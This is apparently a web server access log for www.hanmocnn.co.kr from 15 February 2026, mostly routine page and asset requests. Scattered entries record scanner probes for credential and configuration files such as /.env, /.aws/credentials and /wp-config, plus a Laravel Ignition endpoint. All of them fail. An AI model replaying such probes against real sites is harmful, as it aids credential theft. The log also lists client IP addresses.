AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" -[15/Feb/2026:09:46:05 +0000] - 304 304 - GET https www.hanmocnn.co.kr "/assets/css/style.css" [Client 222.117.41.51] [Length 0] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[15/Feb/2026:09:46:05 +0000] - 304 304 - GET https www.hanmocnn.co.kr "/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000" [Client 222.117.41.51] [Length 0] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[15/Feb/2026:09:46:05 +0000] - 304 304 - GET https www.hanmocnn.co.kr "/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=800" [Client 222.117.41.51] [Length 0] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[15/Feb/2026:09:46:05 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/js/i18n.js" [Client 222.117.41.51] [Length 17296] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[15/Feb/2026:09:46:05 +0000] - 304 304 - GET https www.hanmocnn.co.kr "/assets/js/script.js" [Client 222.117.41.51] [Length 0] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[15/Feb/2026:09:46:09 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/" [Client 222.117.41.51] [Length 8990] [Gzip 5.25] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" -[15/Feb/2026:09:46:09 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/css/style.css" [Client 222.117.41.51] [Length 1411] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[15/Feb/2026:09:46:09 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/ControlRoom3.png" [Client 222.117.41.51] [Length 2500626] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[15/Feb/2026:09:46:09 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000" [Client 222.117.41.51] [Length 2525271] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[15/Feb/2026:09:46:09 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=800" [Client 222.117.41.51] [Length 2525271] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[15/Feb/2026:09:46:09 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/js/i18n.js" [Client 222.117.41.51] [Length 17296] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[15/Feb/2026:09:46:09 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/js/script.js" [Client 222.117.41.51] [Length 4450] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[15/Feb/2026:09:46:10 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/favicon.ico" [Client 222.117.41.51] [Length 194408] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[15/Feb/2026:09:49:40 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/" [Client 222.117.41.51] [Length 8990] [Gzip 5.25] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" -[15/Feb/2026:09:49:40 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/css/style.css" [Client 222.117.41.51] [Length 1411] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[15/Feb/2026:09:49:40 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000" [Client 222.117.41.51] [Length 2525271] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[15/Feb/2026:09:49:40 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/ControlRoom3.png" [Client 222.117.41.51] [Length 2500626] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[15/Feb/2026:09:49:40 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=800" [Client 222.117.41.51] [Length 2525271] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[15/Feb/2026:09:49:40 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/js/i18n.js" [Client 222.117.41.51] [Length 17296] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[15/Feb/2026:09:49:40 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/js/script.js" [Client 222.117.41.51] [Length 4450] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[15/Feb/2026:09:49:41 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/favicon.ico" [Client 222.117.41.51] [Length 194408] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[15/Feb/2026:09:50:41 +0000] - 304 304 - GET https www.hanmocnn.co.kr "/assets/js/i18n.js" [Client 222.117.41.51] [Length 0] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[15/Feb/2026:09:59:16 +0000] - 304 304 - GET https www.hanmocnn.co.kr "/" [Client 222.117.41.51] [Length 0] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" -[15/Feb/2026:09:59:16 +0000] - 304 304 - GET https www.hanmocnn.co.kr "/assets/js/i18n.js" [Client 222.117.41.51] [Length 0] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[15/Feb/2026:10:07:20 +0000] - 304 304 - GET https www.hanmocnn.co.kr "/assets/js/i18n.js" [Client 222.117.41.51] [Length 0] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[15/Feb/2026:10:14:50 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/" [Client 222.117.41.51] [Length 9564] [Gzip 5.11] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" -[15/Feb/2026:10:14:50 +0000] - 304 304 - GET https www.hanmocnn.co.kr "/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000" [Client 222.117.41.51] [Length 0] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[15/Feb/2026:10:14:50 +0000] - 304 304 - GET https www.hanmocnn.co.kr "/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=800" [Client 222.117.41.51] [Length 0] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[15/Feb/2026:10:14:50 +0000] - 304 304 - GET https www.hanmocnn.co.kr "/assets/js/i18n.js" [Client 222.117.41.51] [Length 0] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[15/Feb/2026:10:35:25 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/" [Client 222.117.41.51] [Length 9564] [Gzip 5.11] [Sent-to 192.168.0.250] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "-" -[15/Feb/2026:10:35:25 +0000] - 304 304 - GET https www.hanmocnn.co.kr "/assets/css/style.css" [Client 222.117.41.51] [Length 0] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[15/Feb/2026:10:35:25 +0000] - 304 304 - GET https www.hanmocnn.co.kr "/assets/images/ControlRoom3.png" [Client 222.117.41.51] [Length 0] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[15/Feb/2026:10:35:25 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000" [Client 222.117.41.51] [Length 2525271] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[15/Feb/2026:10:35:25 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=800" [Client 222.117.41.51] [Length 2525271] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[15/Feb/2026:10:35:25 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/js/i18n.js" [Client 222.117.41.51] [Length 17296] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[15/Feb/2026:10:35:25 +0000] - 304 304 - GET https www.hanmocnn.co.kr "/assets/js/script.js" [Client 222.117.41.51] [Length 0] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[15/Feb/2026:10:35:26 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/favicon.ico" [Client 222.117.41.51] [Length 194408] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[15/Feb/2026:10:36:41 +0000] - 304 304 - GET https www.hanmocnn.co.kr "/" [Client 222.117.41.51] [Length 0] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "-" -[15/Feb/2026:10:50:59 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/" [Client 211.234.204.1] [Length 9564] [Gzip 5.11] [Sent-to 192.168.0.250] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Mobile Safari/537.36" "-" -[15/Feb/2026:10:50:59 +0000] - 304 304 - GET https www.hanmocnn.co.kr "/assets/css/style.css" [Client 211.234.204.1] [Length 0] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Mobile Safari/537.36" "https://www.hanmocnn.co.kr/" -[15/Feb/2026:10:50:59 +0000] - 304 304 - GET https www.hanmocnn.co.kr "/assets/images/ControlRoom3.png" [Client 211.234.204.1] [Length 0] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Mobile Safari/537.36" "https://www.hanmocnn.co.kr/" -[15/Feb/2026:10:50:59 +0000] - 304 304 - GET https www.hanmocnn.co.kr "/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000" [Client 211.234.204.1] [Length 0] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Mobile Safari/537.36" "https://www.hanmocnn.co.kr/" -[15/Feb/2026:10:50:59 +0000] - 304 304 - GET https www.hanmocnn.co.kr "/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=800" [Client 211.234.204.1] [Length 0] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Mobile Safari/537.36" "https://www.hanmocnn.co.kr/" -[15/Feb/2026:10:50:59 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/js/i18n.js" [Client 211.234.204.1] [Length 17296] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Mobile Safari/537.36" "https://www.hanmocnn.co.kr/" -[15/Feb/2026:10:50:59 +0000] - 304 304 - GET https www.hanmocnn.co.kr "/assets/js/script.js" [Client 211.234.204.1] [Length 0] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Mobile Safari/537.36" "https://www.hanmocnn.co.kr/" -[15/Feb/2026:10:51:00 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/favicon.ico" [Client 211.234.204.1] [Length 194408] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Mobile Safari/537.36" "https://www.hanmocnn.co.kr/" -[15/Feb/2026:11:15:26 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/.env" [Client 2.57.122.173] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/601.7.7 (KHTML, like Gecko) Version/9.1.2 Safari/601.7.7" "-" -[15/Feb/2026:11:51:20 +0000] - - 301 - HEAD http www.hanmocnn.co.kr "/" [Client 176.65.148.161] [Length 0] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (compatible; Let's Encrypt validation server; +https://www.letsencrypt.org)" "-" -[15/Feb/2026:15:34:19 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/_ignition/execute-solution" [Client 98.82.188.155] [Length 189] [Gzip 3.12] [Sent-to 192.168.0.250] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/133.0.0.0 Safari/537.36" "-" -[15/Feb/2026:18:52:18 +0000] - 304 304 - GET https www.hanmocnn.co.kr "/" [Client 222.117.41.51] [Length 0] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "-" -[15/Feb/2026:18:52:18 +0000] - 304 304 - GET https www.hanmocnn.co.kr "/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000" [Client 222.117.41.51] [Length 0] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[15/Feb/2026:18:52:18 +0000] - 304 304 - GET https www.hanmocnn.co.kr "/assets/images/ControlRoom3.png" [Client 222.117.41.51] [Length 0] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[15/Feb/2026:18:52:18 +0000] - 304 304 - GET https www.hanmocnn.co.kr "/assets/css/style.css" [Client 222.117.41.51] [Length 0] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[15/Feb/2026:18:52:18 +0000] - 304 304 - GET https www.hanmocnn.co.kr "/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=800" [Client 222.117.41.51] [Length 0] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[15/Feb/2026:18:52:18 +0000] - 304 304 - GET https www.hanmocnn.co.kr "/assets/js/i18n.js" [Client 222.117.41.51] [Length 0] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[15/Feb/2026:18:52:18 +0000] - 304 304 - GET https www.hanmocnn.co.kr "/assets/js/script.js" [Client 222.117.41.51] [Length 0] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[15/Feb/2026:19:03:16 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/.env.prod" [Client 45.148.10.238] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_5) AppleWebKit/537.78.1 (KHTML like Gecko) Version/7.0.6 Safari/537.78.1" "-" -[15/Feb/2026:19:03:16 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/awsconfig.js" [Client 45.148.10.238] [Length 189] [Gzip 3.12] [Sent-to 192.168.0.250] "Mozilla/5.0 (Linux; Android 9; Redmi Note 7 Build/PKQ1.180904.001) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/9.4 Chrome/67.0.3396.87 Mobile Safari/537.36" "-" -[15/Feb/2026:19:03:18 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/.env.production" [Client 45.148.10.238] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.4) Gecko Netscape/7.1 (ax)" "-" -[15/Feb/2026:19:03:19 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/.env" [Client 45.148.10.238] [Length 189] [Gzip 3.12] [Sent-to 192.168.0.250] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.142 Safari/537.36" "-" -[15/Feb/2026:19:03:19 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/.env.bak" [Client 45.148.10.238] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 5.1; rv:38.0) Gecko/20100101 Firefox/38.0 SeaMonkey/2.35" "-" -[15/Feb/2026:19:03:21 +0000] - - 301 - GET http www.hanmocnn.co.kr "/.aws/credentials" [Client 45.148.10.238] [Length 166] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.108 Safari/537.36" "-" -[15/Feb/2026:19:03:21 +0000] - - 301 - GET http www.hanmocnn.co.kr "/aws.env" [Client 45.148.10.238] [Length 166] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/1.22 (compatible; MSIE 5.01; PalmOS 3.0) EudoraWeb 2.1" "-" -[15/Feb/2026:19:03:21 +0000] - - 301 - GET http www.hanmocnn.co.kr "/.env.bak" [Client 45.148.10.238] [Length 166] [Gzip -] [Sent-to 192.168.0.250] "Java/1.6.0_13" "-" -[15/Feb/2026:19:03:21 +0000] - - 301 - GET http www.hanmocnn.co.kr "/.env.live" [Client 45.148.10.238] [Length 166] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (X11; FreeBSD i386; rv:28.0) Gecko/20100101 Firefox/28.0 SeaMonkey/2.25" "-" -[15/Feb/2026:19:03:21 +0000] - - 301 - GET http www.hanmocnn.co.kr "/config.env" [Client 45.148.10.238] [Length 166] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/27.0.1453.12 Safari/537.36 OPR/14.0.1116.4" "-" -[15/Feb/2026:19:03:21 +0000] - - 301 - GET http www.hanmocnn.co.kr "/crm/.env" [Client 45.148.10.238] [Length 166] [Gzip -] [Sent-to 192.168.0.250] "LG-LX550 AU-MIC-LX550/2.0 MMP/2.0 Profile/MIDP-2.0 Configuration/CLDC-1.1" "-" -[15/Feb/2026:19:03:21 +0000] - - 301 - GET http www.hanmocnn.co.kr "/wp-config" [Client 45.148.10.238] [Length 166] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Linux; Android 7.0; LG-H918 Build/NRD90M) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Mobile Safari/537.36" "-" -[15/Feb/2026:19:03:21 +0000] - - 301 - GET http www.hanmocnn.co.kr "/awstats/.env" [Client 45.148.10.238] [Length 166] [Gzip -] [Sent-to 192.168.0.250] "Opera/10.61 (J2ME/MIDP; Opera Mini/5.1.21219/19.999; en-US; rv:1.9.3a5) WebKit/534.5 Presto/2.6.30" "-" -[15/Feb/2026:19:23:51 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/" [Client 192.104.34.34] [Length 9577] [Gzip 5.11] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36" "-" -[15/Feb/2026:20:27:02 +0000] - 304 304 - GET https www.hanmocnn.co.kr "/" [Client 211.234.204.1] [Length 0] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Mobile Safari/537.36" "-" -[15/Feb/2026:20:27:03 +0000] - 304 304 - GET https www.hanmocnn.co.kr "/assets/images/ControlRoom3.png" [Client 211.234.204.1] [Length 0] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Mobile Safari/537.36" "https://www.hanmocnn.co.kr/" -[15/Feb/2026:20:27:03 +0000] - 304 304 - GET https www.hanmocnn.co.kr "/assets/css/style.css" [Client 211.234.204.1] [Length 0] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Mobile Safari/537.36" "https://www.hanmocnn.co.kr/" -[15/Feb/2026:20:27:03 +0000] - 304 304 - GET https www.hanmocnn.co.kr "/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000" [Client 211.234.204.1] [Length 0] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Mobile Safari/537.36" "https://www.hanmocnn.co.kr/" -[15/Feb/2026:20:27:03 +0000] - 304 304 - GET https www.hanmocnn.co.kr "/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=800" [Client 211.234.204.1] [Length 0] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Mobile Safari/537.36" "https://www.hanmocnn.co.kr/" -[15/Feb/2026:20:27:03 +0000] - 304 304 - GET https www.hanmocnn.co.kr "/assets/js/i18n.js" [Client 211.234.204.1] [Length 0] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Mobile Safari/537.36" "https://www.hanmocnn.co.kr/" -[15/Feb/2026:20:27:03 +0000] - 304 304 - GET https www.hanmocnn.co.kr "/assets/js/script.js" [Client 211.234.204.1] [Length 0] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Mobile Safari/537.36" "https://www.hanmocnn.co.kr/" -[15/Feb/2026:21:57:08 +0000] - - 301 - GET http www.hanmocnn.co.kr "/" [Client 87.236.176.184] [Length 166] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (compatible; InternetMeasurement/1.0; +https://internet-measurement.com/)" "-" -[15/Feb/2026:21:57:09 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/" [Client 87.236.176.184] [Length 9577] [Gzip 5.11] [Sent-to 192.168.0.250] "Mozilla/5.0 (compatible; InternetMeasurement/1.0; +https://internet-measurement.com/)" "http://www.hanmocnn.co.kr" -[15/Feb/2026:21:57:12 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/favicon.ico" [Client 87.236.176.167] [Length 194408] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (compatible; InternetMeasurement/1.0; +https://internet-measurement.com/)" "-" -[15/Feb/2026:21:57:15 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/favicon.ico" [Client 185.247.137.89] [Length 114] [Gzip 1.34] [Sent-to 192.168.0.250] "Mozilla/5.0 (compatible; InternetMeasurement/1.0; +https://internet-measurement.com/)" "-" -[15/Feb/2026:21:57:16 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/favicon.ico" [Client 167.99.234.119] [Length 114] [Gzip 1.34] [Sent-to 192.168.0.250] "Mozilla/5.0 (compatible; InternetMeasurement/1.0; +https://internet-measurement.com/)" "-" -[15/Feb/2026:22:41:40 +0000] - 304 304 - GET https www.hanmocnn.co.kr "/" [Client 222.117.41.51] [Length 0] [Gzip -] [Sent-to 